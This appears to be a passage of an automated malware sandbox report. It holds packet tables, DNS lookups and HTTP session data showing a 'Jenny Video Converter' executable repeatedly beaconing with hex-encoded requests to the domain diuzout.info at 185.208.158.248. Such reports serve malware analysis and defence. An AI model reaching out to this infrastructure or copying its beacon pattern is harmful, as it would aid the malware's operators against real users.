Oct 8, 2024 04:14:31.702291012 CEST     63205        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.708992958 CEST        80     63204  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:31.709117889 CEST        80     63205  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:31.709189892 CEST     63205        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.709194899 CEST     63204        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.709356070 CEST     63205        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:31.714076996 CEST        80     63205  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:32.416250944 CEST        80     63205  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:32.416311979 CEST     63205        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:32.531862020 CEST     63205        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:32.532222033 CEST     63206        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:32.537328005 CEST        80     63205  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:32.537341118 CEST        80     63206  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:32.537651062 CEST     63205        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:32.537651062 CEST     63206        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:32.537874937 CEST     63206        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:32.542928934 CEST        80     63206  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:33.254429102 CEST        80     63206  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:33.254524946 CEST     63206        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:33.373589993 CEST     63206        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:33.374011993 CEST     63207        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:33.515644073 CEST        80     63207  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:33.515899897 CEST     63207        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:33.515901089 CEST     63207        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:33.516189098 CEST        80     63206  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:33.516258001 CEST     63206        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:33.520903111 CEST        80     63207  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:34.223546982 CEST        80     63207  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:34.223809958 CEST     63207        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:34.342675924 CEST     63207        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:34.342917919 CEST     63208        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:34.347827911 CEST        80     63208  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:34.347923994 CEST     63208        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:34.348021984 CEST     63208        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:34.348047018 CEST        80     63207  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:34.348215103 CEST     63207        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:34.352832079 CEST        80     63208  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:35.056972027 CEST        80     63208  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:35.057169914 CEST     63208        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.170797110 CEST     63208        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.171202898 CEST     63209        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.176390886 CEST        80     63208  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:35.176430941 CEST        80     63209  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:35.176459074 CEST     63208        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.176625013 CEST     63209        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.176713943 CEST     63209        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.181518078 CEST        80     63209  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:35.885575056 CEST        80     63209  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:35.885963917 CEST     63209        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.999238968 CEST     63209        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:35.999366999 CEST     63210        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.004868984 CEST        80     63210  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:36.005076885 CEST     63210        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.005117893 CEST        80     63209  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:36.005148888 CEST     63210        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.005172968 CEST     63210        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.009968042 CEST        80     63210  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:36.696521997 CEST        80     63210  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:36.696717024 CEST     63210        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.811302900 CEST     63210        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.811484098 CEST     63211        80  192.168.2.6      185.208.158.248
Oct 8, 2024 04:14:36.816534042 CEST        80     63211  185.208.158.248  192.168.2.6
Oct 8, 2024 04:14:36.816617966 CEST     63211        80  192.168.2.6      185.208.158.248
                                                                              Oct 8, 2024 04:14:36.816704988 CEST6321180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:36.816946030 CEST8063210185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:36.817118883 CEST6321080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:36.821690083 CEST8063211185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:37.500720024 CEST8063211185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:37.500803947 CEST6321180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.607845068 CEST6321180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.613122940 CEST8063211185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:37.843919992 CEST8063211185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:37.843985081 CEST6321180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.970143080 CEST6321180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.970669031 CEST6321380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.975294113 CEST8063211185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:37.975400925 CEST6321180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.975547075 CEST8063213185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:37.976186991 CEST6321380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.976284981 CEST6321380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:37.981528044 CEST8063213185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:38.666539907 CEST8063213185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:38.666723967 CEST6321380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:38.780184031 CEST6321380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:38.780272007 CEST6321480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:38.785123110 CEST8063214185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:38.785325050 CEST6321480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:38.785360098 CEST8063213185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:38.785413980 CEST6321480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:38.785413980 CEST6321380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:38.790462971 CEST8063214185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:39.488457918 CEST8063214185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:39.488679886 CEST6321480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:39.607947111 CEST6321480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:39.608158112 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:39.613025904 CEST8063215185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:39.613084078 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:39.613168955 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:39.613223076 CEST8063214185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:39.613384962 CEST6321480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:39.617894888 CEST8063215185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:40.324258089 CEST8063215185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:40.324703932 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.436297894 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.441340923 CEST8063215185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:40.675502062 CEST8063215185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:40.675579071 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.797461987 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.797746897 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.802752972 CEST8063216185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:40.802828074 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.802905083 CEST8063215185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:40.802942991 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.802959919 CEST6321580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:40.807787895 CEST8063216185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:41.513390064 CEST8063216185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:41.513566971 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:41.623820066 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:41.629002094 CEST8063216185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:41.860819101 CEST8063216185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:41.861032009 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.015757084 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.016109943 CEST6321780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.021398067 CEST8063217185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:42.021608114 CEST6321780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.021609068 CEST6321780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.021826982 CEST8063216185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:42.021882057 CEST6321680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.027003050 CEST8063217185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:42.705235958 CEST8063217185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:42.705424070 CEST6321780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.826901913 CEST6321780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.826951981 CEST6321880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.832232952 CEST8063218185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:42.832308054 CEST8063217185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:42.832429886 CEST6321880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.832429886 CEST6321780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.832653046 CEST6321880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:42.838548899 CEST8063218185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:43.540287971 CEST8063218185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:43.540491104 CEST6321880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:43.655267000 CEST6321880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:43.655504942 CEST6321980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:43.660414934 CEST8063219185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:43.660499096 CEST6321980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:43.660598993 CEST6321980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:43.660667896 CEST8063218185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:43.660816908 CEST6321880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:43.665807962 CEST8063219185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:44.377959967 CEST8063219185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:44.378093958 CEST6321980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:44.537096024 CEST6321980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:44.537621021 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:44.542615891 CEST8063220185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:44.542689085 CEST8063219185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:44.542691946 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:44.542732954 CEST6321980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:44.542836905 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:44.547724009 CEST8063220185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:45.232326984 CEST8063220185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:45.232631922 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.342981100 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.348117113 CEST8063220185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:45.583451033 CEST8063220185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:45.583771944 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.702047110 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.702517033 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.708363056 CEST8063221185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:45.708436012 CEST8063220185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:45.708482027 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.708494902 CEST6322080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.708553076 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:45.713527918 CEST8063221185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:46.404634953 CEST8063221185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:46.404937983 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.514856100 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.519809961 CEST8063221185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:46.750746965 CEST8063221185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:46.750961065 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.873992920 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.874291897 CEST6322280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.879244089 CEST8063222185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:46.879369974 CEST8063221185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:46.879453897 CEST6322280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.879453897 CEST6322180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.879548073 CEST6322280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:46.884759903 CEST8063222185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:47.566320896 CEST8063222185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:47.566653013 CEST6322280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:47.704663992 CEST6322280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:47.704936028 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:47.710227013 CEST8063223185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:47.710433006 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:47.710490942 CEST8063222185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:47.710665941 CEST6322280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:47.710681915 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:47.715539932 CEST8063223185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:48.435113907 CEST8063223185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:48.435340881 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.545754910 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.550764084 CEST8063223185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:48.785010099 CEST8063223185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:48.785106897 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.905024052 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.905297995 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.910533905 CEST8063223185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:48.910576105 CEST8063224185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:48.910603046 CEST6322380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.910679102 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.910799026 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:48.915631056 CEST8063224185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:49.610023975 CEST8063224185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:49.610148907 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:49.717539072 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:49.723561049 CEST8063224185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:49.955971003 CEST8063224185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:49.956149101 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.076679945 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.076972961 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.082196951 CEST8063224185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.082407951 CEST6322480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.082446098 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.082515001 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.082608938 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.087639093 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.773447037 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.773595095 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.889216900 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.889484882 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.894361973 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.894439936 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.894449949 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.894490957 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.894640923 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.899475098 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.589812994 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.590209007 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:51.701644897 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:51.707032919 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.936835051 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.936933041 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.045609951 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.045907021 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.051090956 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.051170111 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.051439047 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.051650047 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.051650047 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.056561947 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.757633924 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.757843971 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.896616936 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.896886110 CEST6322880192.168.2.6185.208.158.248
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 04:13:15.987190008 CEST | 53 | 60736 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 04:13:18.456633091 CEST | 53 | 58461 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 04:13:20.605865002 CEST | 61935 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 04:13:20.613836050 CEST | 53 | 61935 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 04:13:51.050853968 CEST | 58994 | 53 | 192.168.2.6 | 141.98.234.31
Oct 8, 2024 04:13:51.289334059 CEST | 53 | 58994 | 141.98.234.31 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 04:13:20.605865002 CEST | 192.168.2.6 | 1.1.1.1 | 0xd09b | Standard query (0) | 212.20.149.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 8, 2024 04:13:51.050853968 CEST | 192.168.2.6 | 141.98.234.31 | 0x8e90 | Standard query (0) | diuzout.info | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 04:13:20.613836050 CEST | 1.1.1.1 | 192.168.2.6 | 0xd09b | Name error (3) | 212.20.149.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 8, 2024 04:13:51.289334059 CEST | 141.98.234.31 | 192.168.2.6 | 0x8e90 | No error (0) | diuzout.info | | 185.208.158.248 | A (IP address) | IN (0x0001) | false
                                                                              • diuzout.info
                                                                              • 31.214.157.226
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 63161 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:13:51.788804054 CEST | 319 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c5ec93993c HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:52.485299110 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 34 36 36 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 62 62 33 37 34 66 30 36 37 62 37 33 32 35 36 63 30 65 30 64 35 30 65 63 61 34 32 63 64 37 64 62 30 31 62 66 64 33 32 38 38 33 38 65 33 31 36 62 38 36 37 63 37 35 61 61 35 65 61 34 65 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 34 33 64 37 39 38 63 66 66 31 32 64 65 65 64 39 30 39 39 32 35 63 39 36 61 39 63 31 33 64 38 35 30 38 66 32 31 62 31 35 39 61 64 65 61 35 39 33 66 65 63 37 62 64 37 65 33 37 65 62 63 38 35 65 63 64 35 34 61 65 36 33 35 63 66 31 33 32 62 35 66 35 62 33 65 65 31 32 34 37 36 31 36 36 37 62 39 65 38 38 37 66 66 38 36 32 64 35 31 65 64 35 61 37 65 33 66 66 63 32 62 34 33 66 33 66 39 66 39 38 61 66 63 33 34 37 61 61 34 65 64 34 37 39 39 38 32 66 65 36 34 32 35 31 [TRUNCATED]
                                                                              Data Ascii: 46667b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592deb765bb374f067b73256c0e0d50eca42cd7db01bfd328838e316b867c75aa5ea4ee75b7f43ec2f66943d798cff12deed909925c96a9c13d8508f21b159adea593fec7bd7e37ebc85ecd54ae635cf132b5f5b3ee124761667b9e887ff862d51ed5a7e3ffc2b43f3f9f98afc347aa4ed479982fe642512a36aee9cd5b365d46104283164a753c8c3a43130b8cd06a605b9a837b8c5cb3b7c2810d130e90defd7be194dd33919c155dbf3689e28a9945daafcd5aede3a27bf72b8ed0a90a9be6d5ca399f520ace084831ce715e25a80476fceabc0fed95465a19cf03ba77c830d37ab22df39d9991ece54ab33071f4fcbd76d563a526585f78a2f3267490ec9c5af1210f5dcbbe9dd347479e02183c61b0a4298b4c30a4645d47d75513b4cfdd3d2ceeecb559d226d4afb76318228b6c49278824ac28c3e180b7f9cf796e01d0fa6248bdd166d02db29cdf09816743d7b993502ed57477765984ddab1bde631aacfc318568729c8425686b3de67cc503bbe76e3282fad66835517cba4a4ae64aec3129346d5c0c24fb317be49f4adb06590af27af3137123fc29d7115e3a0cb4d72e3273c34151dd730a843a3019346d5aacd934bf242889eb2c12f10d32820ba825cc75b04024fd [TRUNCATED]
Oct 8, 2024 04:13:52.485327959 CEST | 98 | IN | Data Raw: 30 66 31 61 62 31 66 63 62 66 64 32 32 66 34 61 35 62 61 39 62 34 30 37 66 32 37 38 37 35 66 63 61 64 62 34 34 65 33 31 65 61 36 32 34 36 33 32 33 66 31 39 38 34 39 62 32 64 65 34 63 35 65 36 61 61 39 63 31 33 32 63 31 63 38 39 62 64 62 64 64 62
    Data Ascii: 0f1ab1fcbfd22f4a5ba9b407f27875fcadb44e31ea6246323f19849b2de4c5e6aa9c132c1c89bdbddbb6a83d8050
Oct 8, 2024 04:13:55.147404909 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
    Host: diuzout.info
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:13:55.430424929 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Tue, 08 Oct 2024 02:13:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
